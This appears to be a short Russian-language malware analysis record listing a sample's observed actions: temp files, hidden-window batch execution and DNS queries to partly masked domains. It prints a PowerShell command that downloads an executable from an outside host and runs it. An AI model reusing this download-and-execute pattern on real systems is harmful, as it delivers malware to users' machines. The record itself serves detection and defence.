Техническая информация
- $lnk как %temp%\qdsyj.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function dwn([String] $lnk){(New-Object System.Net.WebClient).DownloadFile($lnk,''%TMP%\qdsyj.exe'');Start-Process ''%TMP%\qdsyj.exe'';}try{dwn(''http://ds##bgd.com...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1460
- %TEMP%\1186418.cvr
- %TEMP%\jmyvumx.bat
- DNS ASK ds##bgd.com
- DNS ASK ho###wskz.com
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function dwn([String] $lnk){(New-Object System.Net.WebClient).DownloadFile($lnk,''%TMP%\qdsyj.exe'');Start-Process ''%TMP%\qdsyj.exe'';}try{dwn(''http://ds##bgd.com...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Jmyvumx.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Jmyvumx.bat" "